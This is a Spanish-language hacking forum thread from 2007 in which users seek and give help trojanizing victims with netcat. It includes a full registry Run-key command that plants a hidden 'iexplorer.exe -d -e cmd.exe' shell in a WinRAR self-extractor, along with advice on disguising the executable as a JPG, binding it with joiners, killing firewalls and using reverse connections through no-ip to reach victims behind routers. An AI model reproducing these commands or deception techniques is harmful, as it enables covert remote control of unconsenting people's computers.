Jugando con netcat

Iniciado por WHK, 25 Marzo 2007, 03:17 AM

0 Miembros y 1 Visitante están viendo este tema.

Wilty

vern soy nuevo en el foro, y este del netcat es para rograar o ocultar un troyano, segun en mis oscuras montaas de mis penamientos un antivirus por ejemplo el kaspersky, puede detectar los troyanos cuando estos se ejecutan, intente abri el Jhon y me elimino de golpe al iwal que el netcat, y otros programas...estos son troyano(me lo indica) o ya define cual es el objetivo del prograa....

D4RIO

No detecta a ninguno de los dos como troyanos... segun las bases de datos de antivirus son o rootkits (No se porque pero bueh)... o hacking tools (ahi me gusto más el nombre), o "software potencialmente no deseado".

Por otro lado las empresas antivirus crean defensas contra lo que ya conocen, y nunca podran detectar nuevas tecnologias de hacking. Un troyano no es un programa que le dice al PC "Hey, soy un troyano, dame el control del sistema", es una compleja maraña de codigo lista para ejecutarse y dejarnos con el control del sistema ante la primera posibilidad.

Lee al respecto, lee mil veces antes de hacer un pregunta que Google te respondera contento.
OpenBSDFreeBSD

snitch

Hola soy muy newbee en esto probe el tuto 1 jugando con Netcat, lo segui y lo hice todo bien aparentemente pero cuando ejecuto el NC para escuchar el puerto 80 me aparece este cartel luego de escuchar un tiempo. yo tengo un servicio de internet con IP Dinamica pero digamos la carnada por asi decirlo fue creada sin desloguearme de la cuenta de servicio de internet o sea tenia la IP que puse en la carnada


http://img385.imageshack.us/my.php?image=01va8.jpg

mis dudas son las siguientes:

1) Que significa ese cartel ? y como puedo conectarme con la victima ?
2) Como puedo solucionar el tema de mi IP Dinamica para no tener que crear la carnada en el momento con la IP que tengo en uso ?. Se que en unas respuestas anteriores a esta publicaron algo de IP Dinamica con la pagina http://www.no-ip.com/ pero no entiendo a que se refiere, me podrian explicar con mas detalles que soy nuevo ?
3) Si mi victima tiene IP Dinamica como hago ?
5) Otra duda que me surgio si hice bien o no es la siguiente. Cuando estoy creando el SFX con el WinRar la linea de comandos que se escribe en "Ejecutar antes de la extracción"  que es %windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\update\iexplorer.exe -d -e cmd.exe 127.0.0.1 80" /f > nul yo la copie y la pegue, en el turorial decia pegarla en una sola linea ya que esta tenia 3 yo, entre linea y linea pegada, no tabule para darle un espacio, eso me influye en la ejecucion del comando ? Le tendria que haber puesto espacio ??
5) Hay problemas con el Firewall de Windows cuando mi victima ejecuta la carnada ??
6) Otra cosa que quiero hacer es la siguiente: pasarle una foto a la victima y esta este envevida por asi decirlo de la carnada. Tengo entendido que esto se hace con un joiner, pero mi pregunta es esta yo con el joiner adjunto la foto, la carnada, y el stub tengo entendido, entonces cuando la victima habre ese archivo (que me gustaria que sea un .jpg con icono de JPG y no un .exe) en teoria se le abririan los tres archivos ? Se le abriria la carnada que seria un pantallazo de DOS, se le habriria la foto y el stub ??  El stub habre la foto y la carnada esto es asi ??
7) Algun Joiner que conozcan que me haga un .jpg que sea un paquete de archivos y estos se ejecuten al abrir el jpg ?
8) Alguien me puede decir donde bajar el Small Joiner o pasarmelo publicado en este foro que me parece que cumple esta funcion ?

El metodo que esta usando para pasarle la carnada a los demas era cambiarle el icono al .exe por el de JPG y renombrarlo como "colita.exe.jpg" por ejemplo, pero MSN no me lo dejaba mandar por ser un .exe y se lo tenia que mandar en un ZIP como un paquete de fotos con este en el medio, lo cual reduce las posibilidades de que lo habran.

Bueno muchas gracias, ustedes me diran, espero sus respuestas
Disculpenme si hice demasiadas preguntas, es que me surgen y soy muy dubitativo.

Gracias...
   :rolleyes:

snitch

Alguien me puede responder ??

Gracias...

elmeister

1) Eso es por usar el puerto 80, mapea otro puerto en tu router que no sea ese, que es el que se usa para internet (ver paginas web quiero decir), y usalo para la conexión

2)Busca, en este y otros foros encontraras manuales sobre no-ip

3)Usa conexion inversa, en la primera parte del tutorial verás como hacerlo (la victima se conecta a ti en lugar de tu a la victima)

4) Tu copia y pega, eso es que no hay bastante espacio por el tamaño de letra que tengas configurado en tu navegador y por tu resolución del monitor como para mostrarlo en una linea, pero como si estuvies en una linea.

5)No lo se cierto, pero puedes unirlo a un FW-Killer para que cierre el firewall y luego abrá el netcat (o carnada si has puesto el mismo nombre que en el tutorial, que no es necesario)

6) Creo que no he entendido bien, pero si es lo que pienso, el Stub se pone de por medio entre los archivos(esto lo hace automáticamente el joiner), y los ejecuta, el Stub se ejecuta para saber que hacer con los archivos que has unido con el joiner.

7)Me temo que no se puede más que con el extension creator o extension maker (no recuerdo cual de los dos nombres era), tendrás que comprimirlo y enviarlo.

8)Mira en el foro, sección troyanos y virus.

P.D: tendrás que aprender por ti mismo, busca, aquí en el foro hay mucho material, si no , usa el google, que para eso está, reguntando aprenderás menos que buscando, probando y equivocandote, aunque, si eres un principiante, habrá que ayudar, digo yo.

P.D 2: Nunca des prisas, esto es un foro, no un chat, la gente responde cuando vea que han dicho algo, y si quiere responder

SubZ3r0-

tngo unas dudas sobre esto..

1-¿¿que diferencia hay de que se conecte ati la victima a tu a ella ninguna???
2-¿¿ambos netcats tienen que tener la misma version o pueden ser diferentes???
3-¿¿cual es el comando para subir un archivo de una shell a otra?
4-¿¿cuando ponemos nc es porque nc es el nombre que le emos puesto al netcat??
si por ejemplo yo le subo a la vicitma el netcat pero con el nombre "pipas" el enve de poner nc -lvvp 8080 -e cmd.exe tendria que poner "pipas" -lvvp 8080 -e cmd.exe (sin las comillas claro.)
5-¿¿el puerto por el cual nos conectamos a ella(directa)ella tiene que tener el puerto abierto??y si es inversa(ella se conecta a nosotros)tengo que tener el puerto yo abierto??
6-¿¿como sabes o diferenciamos la conexion inversa de la directa y viceversa??? depende quien tenga la -l(listen)??


venga saludos y thx.


PD:la que ha posteado martin fierro es directa o inversa??.

Novlucker

#426
1- Con la conexion inversa puedes saltarte un router, es decir, puedes conectar a una pc en lan
También en algunos casos el firewall
2- No tengo idea pero no debería de haber problemas, igualemente es recomendable utilizar la misma versión, si tienes una para que enviar otra?  :-\
3- Te recomiendo leer este post
4- Exacto, es por eso que en ejemplo de Jugando con netcat v1.1 dice iexplorer.exe -d -e cmd.exe 127.0.0.1 80 en lugar de nc -d -e cmd.exe 127.0.0.1 80
5- Si, debe de estar abierto
En conexion directa si la persona tiene un router de por medio también tiene que estar mapeado el puerto
Y en el caso de conexion inversa eres tu quien debe de tenerlo mapeado en el caso de tener router
6- Exacto, depende de quien tenga el listen, la de Martín Fierro es directa

Saludos

[Modifico]: Me faltó decir que con la conexión inversa solucionas el problema de que la victima tenga ip dinámica, y en caso de que quién tenga ip dinámica seas tu te es más sencillo configurarte una cuenta no-ip  ;)
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

snitch

Gracias Elmeister !!!!!   Ya se que no es un chat es solo que habian pasado unos dias y nadie me respondia porke lo que pense que nadie iba a responder porke el post tenia muchas respuestas.

Lo voy a probar......  :D

SubZ3r0-

alguien me puede decir si he cometido un error o esque la victima que e elejido no cumple algun requisito???

o algun fallo o algo...

porque lo e intentao y no e podio (lo e probao con una victima troyanizada)

aki os dejo la screen:

http://img145.imageshack.us/my.php?image=nuevoimagendemapadebitsba9.png

Novlucker

De nada  :¬¬

Seguramente la otra persona tiene un firewall, esta detras de un router, o bien tiene AV y ha detectado el nc

Saludos
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein